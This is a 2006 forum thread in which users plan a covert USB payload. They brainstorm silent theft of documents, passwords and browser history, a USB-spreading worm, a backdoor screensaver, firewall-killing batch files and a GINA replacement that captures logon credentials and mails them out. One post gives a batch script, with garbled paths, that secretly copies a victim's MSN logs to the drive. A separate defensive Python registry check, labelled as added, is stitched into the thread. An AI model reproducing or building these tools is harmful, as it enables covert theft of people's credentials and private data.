Moo Posted October 29, 2006
Well, I can't make 'em, but we can give developers ideas here. Feel free to add on. I want...
Something that will email all new documents on the computer to an email address.
Something to infect any other USB thumbdrives put into computer, that will propagate and do all this stuff.
An antidote that only takes off certain parts.
Maybe something that would listen for a signal and open a certain website when told a url through a program.
Something that would send you history, passwords every so often through email.
spektormax Posted October 29, 2006
Something that will email all new documents on the computer to an email address. -- could be done but messy.
Something to infect any other USB thumbdrives put into computer, that will propagate and do all this stuff. -- I've built it but won't release it public for a while for fear of skiddies using it to procreate their botnets. PM me if you want it.
An antidote that only takes off certain parts. -- edit the batch
Maybe something that would listen for a signal and open a certain website when told a url through a program. -- why, and it would be very hard since most people have routers/firewalls
Something that would send you history, passwords every so often through email. -- will be built into packages (but only sent once because doing it more than that requires scheduling tasks which is visible)
Shiva Posted November 11, 2006
how bout a feature that checks da local installed firewall for apps dat have permission to access the net, and then use those programs to send out the mail, instead of disabling / re-enabling the firewall or messy stuff like that. It would b kewl since, getting at the info is not a prob, getting it out and to you in a manner to not alert any trace of suspicion is the trickier part
renegadecanuck Posted November 11, 2006
Documents - Like Spektro said, would be very messy.
Infect - Trust me, you do NOT want that. It could easily come back to bite you in the ass. VNC is set with a default password, so anyone who's visited this site could connect to the box if they discover one is infected (unlikely, but possible). Among many other ethical issues.
Semi Antidote - Pretty much already in my payload, but the VNC one has a few flaws (which are easy to fix), but I'm not sure if I'm gonna keep uploading my progress since I'm worried about script kiddies.
@Shiva: Please don't use text message speak (plz dnt use txt spk), it makes your message VERY hard to read (i cnt undrstnd it), and the feature you requested would be pretty difficult to accomplish, especially in an automated switchblade (to fukin hard). Nay, I think it would be impossible to do (no fukin way).
P.S. I have ways of making you say "the", "that" and "be".
Shiva Posted November 13, 2006
hi Renegaecanuck, how about using http streaming to bypass firewalls? Since most firewalls are set up to allow HTTP traffic to go through which will of course mean both connections will have to be on at the same time. But at least this way, the level of suspicion aroused is tiny if not nil :D
renegadecanuck Posted November 13, 2006
Shiva, thanks for typing normally, and sorry if I sounded like a condescending ass. So what you're basically thinking is using a web-based app to detect what firewall a target is using and what programs have authorization? Obviously detecting the firewall would be easy (if you can code), and if you know enough about the firewall (such as where it stores its "safe" programs lists), you can find out what programs are allowed. And then you CAN use those programs to send information. So I take back what I said about it being impossible, but it would be difficult to do (at least for someone like me who knows very little about coding). And I may have overcomplicated it, but (especially if a person does it my way), there would be quite a bit of code to cover all the variables (different types of firewalls, different allowed programs, etc).
Spartain X Posted November 13, 2006
For the firewall part I have developed a bat that stops the service and kills that program, this can be easily adapted so the service is paused. If anyone is interested I can supply the files. Unfortunately it works on AVG, BitDefender and McAfee and soon Avast (this is mainly due to me not having access to most commercial AVs and firewalls).
remkow Posted November 13, 2006
Could you post the batch file?? I currently only have sygate, and for the AVs I have bitdefender and avast
Shiva Posted November 14, 2006
Sorry for the typos earlier -
> Obviously detecting the firewall would be easy (if you can code), and if you know enough about the firewall (such as where it stores its "safe" programs lists), you can find out what programs are allowed. And then you CAN use those programs to send information.
erm ... instead of catering to a bunch of firewalls, how bout targeting only the most frequently used 1, such as Zone Alarm - it's popular - and it's pretty good. So a successful pentest on that would pave the way for others?? LOL
ZA by default gives the default browser, alg.exe (Application Layer Gateway Service), svchost.exe (Generic Host Process for Win32 Services), access to the net.
renegadecanuck Posted November 14, 2006
Ok, great, if the target machine uses Zone Alarm. But for the rest of the computers that don't, it's useless.
Psycho275 Posted November 17, 2006
A suggestion: Instead of just dumping local password hashes or hashes from cached LDAP logins, why not "steal" the username and password straight from where it's input... WINLOGON / GINA. It is possible to create a custom version of MSGINA.DLL and tell Winlogon to use it [source]. I don't have enough programming knowledge / experience to code a replacement DLL for GINA myself, but perhaps someone else could?
The replacement for MSGINA.DLL could "capture" the username and passwords of users who log on, write it to a text file, then use the method used by the USB Hacksaw to connect to gmail and send the usernames and passwords at certain intervals.
From what I've read, it would be possible to create a replacement for MSGINA.DLL, change the registry to point to the replacement (avoiding the problem of Windows System File Protection), use the same method as the USB Hacksaw to run a service / program at logon which could periodically send the contents of the username and password file to the gmail account. Obviously this would require administrator privileges, but I'm sure it's possible.
One other suggestion: A replacement screensaver which launches cmd.exe at the logon screen when a certain key combination is pressed? Again, just a simple screensaver, a small "backdoor" and a quick registry change.
--Psycho275
References for first suggestion:
http://msdn.microsoft.com/library/default....curity/gina.asp
http://msdn.microsoft.com/library/default....on_and_gina.asp
http://www.microsoft.com/technet/prodtechn...ity/msgina.mspx
http://msdn.microsoft.com/library/default....on_and_gina.asp
http://msdn.microsoft.com/msdnmag/issues/0...SecurityBriefs/
http://msdn2.microsoft.com/en-gb/library/aa375198.aspx
http://www.microsoft.com/technet/prodtechn...ity/msgina.mspx
http://en.wikipedia.org/wiki/GINA
http://en.wikipedia.org/wiki/Winlogon
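Added example (not part of any post in this thread): a defender-side check for the two registry changes the post above describes, a GINA override and a swapped logon screensaver, run over decoded `.reg` export text. The key and value names are the documented Winlogon `GinaDLL` value and the `.DEFAULT` user's `SCRNSAVE.EXE` value; the baseline data and the sample export are assumptions constructed for illustration.

```python
import re

# Assumed baseline (adjust to your build): the stock GINA and logon screensaver.
# A missing GinaDLL value means Winlogon loads msgina.dll, so any other data is suspect.
BASELINE = {
    (r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon",
     "ginadll"): {"msgina.dll"},
    (r"hkey_users\.default\control panel\desktop",
     "scrnsave.exe"): {"logon.scr"},
}
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')

# Constructed sample of decoded .reg export text (not taken from a real host).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"GinaDLL"="C:\\Temp\\msgina.dll"

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"SCRNSAVE.EXE"="logon.scr"
'''

def audit_reg_export(text):
    """Return (key, value name, data) for watched values that differ from BASELINE."""
    findings, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]          # new key section
            continue
        m = VALUE_RE.match(line)
        if m is None or key is None:
            continue                  # header, blank line, or non-string value
        allowed = BASELINE.get((key.lower(), m.group("name").lower()))
        if allowed is None:
            continue                  # not a value we baseline
        data = m.group("data").replace("\\\\", "\\")   # .reg escapes backslashes
        # Exact match only: a same-named DLL in another directory is still flagged.
        if data.lower() not in allowed:
            findings.append((key, m.group("name"), data))
    return findings

if __name__ == "__main__":
    for key, name, data in audit_reg_export(SAMPLE_EXPORT):
        print(f"REVIEW {key}\\{name} = {data}")
```

Real `regedit` exports are UTF-16, so decode the file before passing its text in.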
u3man2007 Posted November 24, 2006
I think it would be nice if this U3 hak had the ability to ...
- Copy all data from one thumbdrive to another thumbdrive as they are both in the computer at the same time... for example
1 Somebody already is sitting down at their computer working away with their own thumbdrive already plugged in.
2 Then somebody else comes along and plugs their own thumbdrive into another usb port on that same computer.
3 Finally that new person's thumbdrive automatically intercepts all data on the original person's thumbdrive while both drives are plugged in.
I don't think this would be too hard to do, but my question is how do you configure the always changing drive letters to the thumbdrives?? Let me know what you guys think?? (If it is as simple as a .bat or editing the .cmd file, then would somebody show me the code for it ??) thanks
SmoothCriminal Posted November 24, 2006
An easy way to stop it from hacking
renegadecanuck Posted November 25, 2006
As in avoid running the scripts, you can either rename the go.cmd, or hold shift while plugging it in. If you mean cancel halfway through, it would basically be impossible since we're trying to do this silently without anyone noticing, and the only way to enable disability would be to make a command prompt show up.
majk Posted November 25, 2006
> As in avoid running the scripts, you can either rename the go.cmd, or hold shift while plugging it in. If you mean cancel halfway through, it would basically be impossible since we're trying to do this silently without anyone noticing, and the only way to enable disability would be to make a command prompt show up.
Why not just rip out the USB?
renegadecanuck Posted November 25, 2006
1. Might cause file corruption or wreck the drive if you rip it out while it's reading from or writing to it (I've lost all data on it before that way)
2. Kinda defeats SC's purpose from what I gather.
sm.ith Posted November 26, 2006
what if the usb copied people's saved msn convos
that might take up a lot of space but it would be pretty cool
majk Posted November 26, 2006
> what if the usb copied people's saved msn convos
> that might take up a lot of space but it would be pretty cool
It should be easy to have it copy the files from where MSN stores its logs to the USB.
DLSS Posted November 26, 2006
> > what if the usb copied people's saved msn convos
> > that might take up a lot of space but it would be pretty cool
> It should be easy to have it copy the files from where MSN stores its logs to the USB.
yeah i've written this before .... if i'm not mistaken it's somewhere on this forum ... hell or just give me the save location and i'll rewrite it ... here u go :
@echo off
:: msngrab.cmd
:makedir
mkdir %~d0grabmsnlogs%computername%-%username%
:english
xcopy "C:Documents and Settings%username%My DocumentsMy Received Files*.xml" "%~d0grabmsnlogs%computername%-%username%" /s/c/q/r/h/y
xcopy "C:Documents and Settings%username%My DocumentsMy Received Files*.xsl" "%~d0grabmsnlogs%computername%-%username%" /s/c/q/r/h/y
:dutch
xcopy "C:Documents and Settings%username%Mijn documentenMijn ontvangen*.xml" "%~d0grabmsnlogs%computername%-%username%" /s/c/q/r/h/y
xcopy "C:Documents and Settings%username%Mijn documentenMijn ontvangen*.xsl" "%~d0grabmsnlogs%computername%-%username%" /s/c/q/r/h/y
cls
cd
exit
notes :
- only works on english and dutch installs of windows (other languages give the my documents and received files a different name)
- only works if they have their logs folder set to the standard one.
Slopigyo Posted December 22, 2006
> Something that would send you history, passwords every so often through email. -- will be built into packages (but only sent once because doing it more than that requires scheduling tasks which is visible)
Just have it send whenever another action happens like the hacksaw.